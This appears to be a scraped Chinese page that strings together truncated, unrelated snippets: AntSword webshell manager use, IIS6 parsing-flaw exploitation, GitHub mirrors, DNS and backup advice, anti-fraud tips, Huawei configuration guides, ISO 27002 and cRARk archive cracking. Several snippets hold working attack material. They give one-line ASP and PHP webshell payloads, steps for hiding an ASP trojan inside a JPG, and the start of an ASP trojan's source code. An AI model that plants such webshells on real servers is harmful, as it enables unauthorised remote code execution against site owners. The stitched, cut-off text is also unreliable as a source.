HQY 一个和谐有爱的空间

【摘要】 Web安全-AntSword（中国蚁剑）Webshell管理工具使用01 工具下载地址https://github.com/AntSwordProject/蚂剑工具的下载分为两个部分，一个是项目核心源码antSword，另一个是加载器AntSword-Loader。我们依次进行下载，并且进行说明先点击进入antSword，点击页面右侧"releases"，进入工具的源码下载页面进行源码下载。而后点击进入AntSword-Loader，点击页面右侧"rele

0x00 简介蚁剑(AntSword)是一款开源的跨平台WebShell管理工具，它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。蚁剑推崇模块化的开发思想，遵循开源，就要开得漂亮的原则，致力于为不同层次的人群提供最简单易懂、方便直接的代码展示及其修改说明，努力让大家可以一起为这个项目贡献出力所能及的点滴，让这款工具真正能让大家用得顺心、舒适，让它能为大家施展出最人性化最适合你的能力！0x01 安装蚁剑分为加载器和核心模块两部分，核心源码可由加载器自动下载源码地址：github

asp图片木马的制作和使用先看代码：仅需几步：图片和一句话木马合并，制作可以正常显示的图片木马。1、找一张图片，名字改成1.jpg 2、<%eval request(“a”)%>存为1.asp（就是一句话木马） 3、copy 1.jpg /b + 1.asp /a asp.jpg 存为1.bat文件注：以上三个文件放在同一目录里面复制当前目录下的1.jpg图片和当前目录下的1.asp文件并以ASCII代码的方式合并为 asp.jpg图片，运行1.bat，就会出现一个图片asp.jpg

一、解析漏洞需要vulhub环境，调试命令如下：点击查看代码1、IIS6vulhub 里面没有 IIS 的靶场，可以使用罗杰老师提供的03 server r1版本，用户名密码：administrator/123456。解析漏洞介绍1）当建立?.asa、?.asp 格式的文件夹时，其目录下的任意文件都将被 IIS 当做 asp 文件解析。2）当文件?.asp;?.jpg 在IIS6.0下同样会将文件当做 asp 文件解析。步骤新建一个 IIS.ASP 文件点击查看代码把 IIS.ASP 复制一份，

概述在很多的渗透过程中，渗透人员会上传一句话木马（简称Webshell）到目前web服务目录继而提权获取系统权限，不论asp、php、jsp、aspx都是如此，那么一句话木马到底是什么呢?先来看看最简单的一句话木马：代码语言：javascript复制   <?php @eval($_POST['attack']);?>只听到从架构师办公室传来架构君的声音:松叶堪为酒，春来酿几多。有谁来对上联或下联?【基本原理】利用文件上传漏洞，

一个ASP木马程序的源代码 ＜%@ LANGUAGE = VBScript.Encode codepage ="936" %＞＜%Server.ScriptTimeOut=5000%＞＜object runat=server id=oScript scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"＞＜/object＞＜object runat=server id=oScr

如果你所在地区不翻墙的情况下无法打开github.com网站，那么可以通过github镜像网站访问github，或者通过修改电脑本地hosts文件来访问github。一：通过github镜像网站访问githubgithub镜像站点1：https://bgithub.xyzgithub镜像站点2：https://agithub.xyz kkgithub镜像3：https://kkgithub.com/使用方法：比如你在访问GitHub某个页面：https://github.com/Itf

我的電視·〇電視視頻播放軟件，可以自定義視頻源my-tv-0使用遙控器左鍵/觸屏單擊打開視頻列表遙控器右鍵/觸屏雙擊打開配置遙控器返回鍵關閉視頻列表/配置在聚焦視頻標題的時候，右鍵收藏/取消收藏打開配置后，選擇遠程配置，掃描二維碼可以配置視頻源等。也可以直接遠程配置地址 http://0.0.0.0:34567如果視頻源地址已配置，並且打開了“應用啟動后更新視頻源”后，應用啟動后會自動更新視頻源默認遙控器下鍵/觸屏下滑切換到下一個視頻。換台反轉打開後，邏輯相反注意：遇到問題可以先考慮重

2024选择适合的公共DNS前言2024.6.14 更新， 更新小众DNS服务，增加了一些小厂商的DNS服务。2024.7.3 更新，添加ipv4dns停服说明2024.7.25更新，添加阿里dns免费版接入限速通知由于之前用的公共DNS开始变得不稳定，所以重新找一下目前市面上常见的和可能好用的DNS Server。选择适合的公共 DNS 对于在中国大陆使用互联网是非常重要的，因为它可以影响到你的网络连接速度、安全性和稳定性。主要考虑因素速度和稳定性：选择一个能够提供良好速度

网络备份储存的几种选择因为数据很重要,这其中还有大量的代码片段,笔记,各种资料文档等等。所以，必要的多处异地备份显得重要，这里给出几个我常用的同步存储的选择。2023.7.5更新：近期闲鱼上的硬盘价位较低，400入手了一个4T移动机械硬盘作为备份选择之一。2024.4.5更新：由于近期微软针对E5订阅的消极支持态度，更新备份策略及网盘的推荐。目前备份策略为Bitiful+家庭版Office365提供的1T的Onedrive。前言由于数据安全性和完整性必须得到保证,如果选用本地加密后上传,取回数据

你应该知道的网络防骗小知识鉴于韭菜还是太多了，总结一些常见的网络诈骗及窃取隐私的套路。1.网站1.1钓鱼网站此类网站大多假冒知名网站或需要输入敏感信息的网页，比如假冒缴费/银行以诱导输入账号密码/银行卡/密码等关键信息达到盗取钱财的目的。大约一半的钓鱼网站的域名较为杂乱以个人的经验判断，如果浏览器提示不安全，那么有80%的概率此网站为假冒网站。1.2第三方软件下载站此类网站专坑不去官网下载软件的懒人及小白用户。下载的软件中包含恶意程序，可能盗取你的浏览器中保存的账号密码/劫持你的浏览器首页作为其

酷狗音乐解析这里还是起了一点波折酷狗音乐是通过hash来获取音乐的，刚开始我并没有去直接抓包，而是通过百度去看看前辈没抓下来的接口http://m.kugou.com/app/i/getSongInfo.php?cmd=playInfo&hash=A12B8551334EEA1EA8E2A53A89741675刚开始确实是通过这个抓到了音乐的真实地址json格式化一下可以看到我们确实获取到了之后我使用php的curl函数去模拟请求获取返回json数据出了问题之后就是无论请求多少次都是这样

一、问题现象GitHub页面时而能访问，时而不能。不是慢，而是不能访问。当然，下载它的比如仓库Release下的压缩包比较慢则是另一回事。蛋疼的影响不限于打不开页面，更多的在于不能git pull和git push等操作。范围方面，凡国内不管是家宽、移动网络还是云上的，都受到一致的影响。二、问题原因1、DNS解析污染网上有个这个说法，大致原理就是“某某”通过拦截你发起的GitHub域名解析请求并伪装返回非正确的IP地址。但我有些怀疑，打不开GitHub也没见什么其他页面显示出来，怀疑这个“某某”

http://file.xipunet.com/西普软件  CtrlK?主页/西普软件名称大小修改时间.htaccess.bak93B2020-10-25 19:39:3001_windows-2024-12-25 18:04:5302_software-2024-12-25 18:02:5703_servertools-2024-12-25 17:57:3604_switch-2024-12-25 17:58:1905_game-2024-12-26 00:26:4707_

在网络设备的部署过程中，通过 PC1 经设备 Console 口登录并进行基本配置，以及后续用 PC2 以 Telnet 方式验证配置结果，是至关重要的操作。这一系列步骤为设备在网络环境中的稳定运行和有效管理提供了保障。使用 Console 口登录设备是整个配置过程的起始点。首先，将 PC1 和设备通过 Console 线正确连接，这是物理层面的连接基础。然后在 PC1 上启动终端仿真程序，依据设备的要求，准确配置串口参数，这些参数包括波特率、数据位、停止位和奇偶校验等。其中，波特率通常为 96

用户名admin，密码Admin@storage物理机浏览器访问https://ip:8088，登录进去1、先修改时间：设置---基本信息---设备时间---手动修改---设为2019.8.12之前时间2、导入License：设置---License管理---导入5000并激活---选择对应的(刚刚的02到06)--上传--激活

CloudEngine S8700 V600R023C10 配置指南-用户接入与认证    https://support.huawei.com/enterprise/zh/doc/EDOC1100366594/1777aea9举例：配置无线Portal认证示例（使用Portal协议）组网需求如图3-56所示，某企业DeviceA作为WAC，与AP直连。通过WLAN部署，提供名为“wlan-net”的无线网络方便员工接入。同时，WAC作为DHCP服务器为无

          ISO/IEC 27002:2022中文版（8部分+附录）ISO/IEC JTC1 SC27 信息安全、网络安全和隐私保护—信息安全控制ISO/IEC 27002:2022 (中文版) 翻译：闲庭信步 2022年7月8 技术控制8.1 用户终端设备控制应保护在用户终端设备上存储、处理或访问的信息。目的保护信息免受使用用户终端设备带来的风险。指南一般原则组织应针对用户终端设备的安全配置和处

历史回顾1996.01：USB 1.0 标准发布，但并没有广泛流入市场1998.08：USB 1.1 标准发布，这是最早被广泛采用的标准2000.04：USB 2.0 标准发布，得益于技术的快速发展，很多电子设备均采用了该标准2008.11：USB 3.0 标准发布，开始支持全双工传输，显著的特征是将原先黑色的母口改为蓝色2013.07：USB 3.1 标准发布，将原 USB 3.0 重新命名为 USB 3.1 Gen 1，新标准命名为 USB 3.1 G

　　cRARk 是一个免费的命令行 rar/7z 压缩包密码破解工具，支持 GPU 加速。官网下载 cRARkWindows 平台 GPU 用户，导入 driver-timeout.reg 注册表，后重启cRARk 压缩包中有一个加密的测试文件，我们对这个压缩包进行测试，不到 20 秒就破解完毕，其中 UTF-16 就是该文件的密码12345cRARk.exe -pcrarckme.def crark55.rar> UTF-16 - Pas